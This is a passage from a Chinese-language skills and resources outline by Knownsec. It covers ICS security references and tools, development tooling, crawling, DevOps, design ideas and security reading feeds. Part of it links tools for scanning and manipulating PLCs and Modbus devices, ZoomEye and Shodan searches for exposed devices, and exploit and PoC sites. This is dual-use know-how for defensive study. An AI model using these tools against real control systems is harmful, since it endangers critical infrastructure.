            • http://ics-isac.org 
          • NTSB美国国家工控测试床
            • http://energy.gov/oe/downloads/common-cyber-security-vulnerabilitiesobserved-control-system-assessments-inl-nstb 
          • NIST SP 800-82
            • http://csrc.nist.gov/publications/nistpubs/800-82/SP800-82-final.pdf 
          • ISA-99控制系统安全协会
            • http://isa99.isa.org/ISA99%20Wiki/Home.aspx 
          • NERC CIP标准
            • http://www.nerc.com/pa/Stand/Pages/ReliabilityStandards.aspx 
      • 工具
        • 仿真类
          • 电力仿真软件testhaness
          • Modbus仿真软件ModScan
          • 电力104协议仿真软件PMA
        • 测试类
          • Wurldtech Achilles
          • Codenomicon Defensics
          • Spirent
          • BPS
        • 源代码
          • 发现
            • https://code.google.com/p/plcscan/ 
            • https://code.google.com/p/modscan/ 
            • https://github.com/arnaudsoullie/scan7 
            • https://github.com/atimorin 
            • https://github.com/digitalbond/Redpoint 
          • 操纵
            • https://www.scadaforce.com/modbus 
            • https://github.com/bashwork/pymodbus 
            • https://rubygems.org/gems/modbus-cli 
            • http://libnodave.sourceforge.net 
            • https://code.google.com/p/dnp3 
          • 异常监测
            • http://blog.snort.org/2012/01/snort-292-scada-preprocessors.html 
            • http://www.digitalbond.com/tools/quickdraw/ 
          • Fuzz
            • https://github.com/jseidl/peach-pit/blob/master/modbus/modbus.xml 
      • 其他
        • ZoomEye工控专题： http://ics.zoomeye.org/ 
        • Shodan工控专题：https://www.shodan.io/report/l7VjfVKc 
        • https://github.com/evilcos/papers/blob/master/网络空间工控设备的发现与入侵.ppt 
    • zoomeye.org
      • 全球可以找到无数真实路由器/摄像头/工控设备等
      • 如：http://www.zoomeye.org/search?q=app:%22MikroTik%20RouterOS%22&from=dork 
  • 研发清单
    • 编码环境
      • pip
      • Docker/Vagrant
      • tmux/screen
      • vim
      • Markdown
      • zsh + oh-my-zsh
      • Python2.7+/3+
      • >Django1.4
        • http://djangobook.py3k.cn/2.0/ 
        • Django Debug Toolbar 
        • 其他框架
          • web.py
          • Flask
          • Tornado
      • node.js
      • Ubuntu/Gentoo/Centos
      • ipython
      • 版本控制
        • 废弃SVN，全面拥抱Git
        • GitLab
      • Nginx+uWSGI
    • Python
      • 官方手册
        • 至少过一遍，这都没过一遍，视野会局限
        • 行之说：「我没看过Python的书，却熟读官方手册…」
    • Linux/UNIX
      • 书
        • 《鸟哥的Linux私房菜》
        • 《Linux Shell脚本攻略》
        • 《UNIX编程艺术》
        • 《Software Design 中文版 01》《Software Design 中文版 02》《Software Design 中文版 03》
      • 让你的电脑默认操作系统就是Linux…
    • 前端  知道创宇研发技能表
      • 书
        • 《JavaScript DOM编程艺术》
      • 了解DOM
        • 这同样是搞好前端安全的必要基础
      • 库
        • jQuery
          • 优秀的插件应该体验一遍，并做些尝试
          • 官方文档得过一遍
        • D3.js
        • ECharts
          • 来自百度
        • Google API
        • ZoomEye Map组件
          • ZoomEye团队自己基于开源的打造
        • AngularJS
          • Google出品的颠覆性前端框架
        • Bootstrap
          • 应该使用一遍
    • 爬虫进阶
      • 代理池
        • 爬虫「稳定」需要
      • 网络请求
        • wget/curl
        • urllib2/httplib2/requests
        • scrapy
      • 验证码破解
        • pytesser
    • 调度
      • crontab是最原生的定时调度
      • 基于redis实现的分布式调度
      • 基于rpyc实现的分布式调度
      • celery/gearman等调度框架
    • 并发
      • 线程池
        • 进程内优美的并发方案
      • 协程
        • 进程内另一种优美的并发方案
        • gevent
      • 多进程
        • os.fork
        • multiprocessing
    • 数据结构
      • JSON
      • cPickle
      • protobuf
    • 数据存储及处理
      • 数据库
        • MySQL
        • MongoDB
        • Cassandra
        • Hadoop体系
        • Redis
        • Sqlite
        • bsddb
        • ElasticSearch
      • 大数据处理
        • Hive
        • Spark
        • ELK
          • ElasticSearch
          • Logstash
          • Kibana
    • DevOps  知道创宇研发技能表
      • SSH证书
      • Fabric
      • SaltStack
      • puppet
      • pssh/dsh
      • 运维进阶
        • 运维工程师必须掌握的基础技能有哪些？
        • http://www.zhihu.com/question/23665108/answer/25299881 
    • 调试
      • pdb
      • logging
      • Sentry
      • strace/ltrace
      • lsof
      • 性能
        • Python内
          • timeit
          • cProfile
          • Python性能分析指南：http://www.oschina.net/translate/python-performance-analysis 
        • Python外
          • top/htop/free/iostat/vmstat/ifconfig/iftop…
    • 算法
      • 分词
      • 贝叶斯
      • 神经元
      • 遗传算法
      • 聚类/分类
      • …
    • 持续集成
      • 自测试
        • nose
      • Jenkins
    • 安全
      • 我的分享
        • 程序员与黑客：http://www.infoq.com/cn/presentations/programmers-and-hackers 
        • 程序员与黑客2：http://www.infoq.com/cn/presentations/programmers-and-hackers-part02 
    • 协作  知道创宇研发技能表
      • 类似Trello的在线协同平台
      • Slack
      • 微信
      • 立会
  • 设计思想
    • 人人都是架构师：具备架构思想是一件多酷的事
    • 实战出真知
    • 如何设计
      • 任务架构设计变迁.pdf 
      • 松耦合、紧内聚
      • 单元与单元属性
      • 生产者与消费者
      • 结构
        • 队列
        • LRU
      • 分布式
        • 存储
        • 计算
      • 资源考虑
        • CPU
        • 内存
        • 带宽
      • 粗暴美学/暴力美学
        • 大数据，先考虑run it，然后才能知道规律在哪
        • 「run it优先」能快速打通整体，洞察问题
        • 「run it优先」能摆脱细节（繁枝末节）的束缚
        • 「run it优先」能快速迭代出伟大的v1
      • 一个字总结
        • 美
  • 牛人1,2,3  知道创宇研发技能表
    • 1研究：研究东西，有足够洞察力，研究水准不错
    • 2研发：Hack Idea自己有魄力实现，不懂研发的黑客如同不会游泳的海盗
    • 3工程：研发出来的需要实战、需要工程化，否则只是玩具，而不能成为真的武器
• 优质资源
  • 书
    • 多关注电子工业/图灵/机械工业/人民邮电等出版社，他们有专业团队来保障每年输出优质书籍
    • 自己需要掌握鉴别好书的能力
  • 站点
    • 知乎周刊：http://zhuanlan.zhihu.com/Weekly 
    • 码农周刊：http://weekly.manong.io/ 
    • Pycoder’s Weekly：http://pycoders.com/archive/ 
    • Hacker News：https://news.ycombinator.com/ 
    • Startup News：http://news.dbanotes.net/ 
    • 开发者头条：http://toutiao.io/ 
    • 极客头条：http://geek.csdn.net/ 
    • InfoQ：http://www.infoq.com/cn 
    • Stack Overflow：http://stackoverflow.com/ 
    • GitHub：https://github.com/ 
    • FreeBuf：http://www.freebuf.com/ 
    • WooYun：http://drops.wooyun.org/ 
    • 深蓝阅读：http://bluereader.org/ 
  • RSS订阅
    • 漏洞相关
      • http://seebug.org/rss.xml 
      • https://www.exploit-db.com/rss.xml 
      • https://rss.packetstormsecurity.com 
      • http://www.wooyun.org/feeds/public 
    • 强烈推荐圈内人打造的深蓝阅读
      • http://bluereader.org/ 
      • 这上面已经很多黑客/技术类似的RSS资源了
  • 威胁情报
    • 本来不想提任何这方面的，想想还是抖个资源，如下
    • https://github.com/kbandla/APTnotes 
  • 安全平台
    • 在线学习平台
      • i春秋：http://www.ichunqiu.com 
      • https://pentesterlab.com 
    • PoC提交与学习
      • Seebug: http://seebug.org 
      • Beebeeto: http://www.beebeeto.com 
      • Bugscan: http://www.bugscan.net 
      • Tangscan: http://www.tangscan.com 
        知道创宇研发技能表 from